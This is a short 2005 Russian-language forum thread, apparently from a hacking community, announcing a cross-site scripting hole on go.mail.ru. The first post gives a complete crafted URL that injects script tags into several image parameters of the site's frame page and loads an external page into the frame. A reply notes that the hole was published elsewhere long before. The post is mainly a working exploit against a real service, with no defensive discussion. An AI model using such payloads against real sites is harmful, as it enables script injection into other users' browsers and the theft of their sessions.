xss на go.mail.ru

Discussion in 'Мировые новости. Обсуждения.' started by koldun, 27 Nov 2005.

  1. koldun

    koldun Banned

    Joined:
    23 Sep 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    XSS на go.mail.ru

    Новая XSS-уязвимость на go.mail.ru:

    http://go.mail.ru/frame.html?imgurl=http://antisec.2x4.ru/index.htm&pageurl=http://antisec.2x4.ru/index.htm&iid=aWAoanJ00EEJ&imgwidth=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgheight=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&imgsize=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E&images_links=%3Cscript%3Ealert('www.xss.ru')%3C/script%3E
     
  2. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    На web-hack'e это вроде давно висит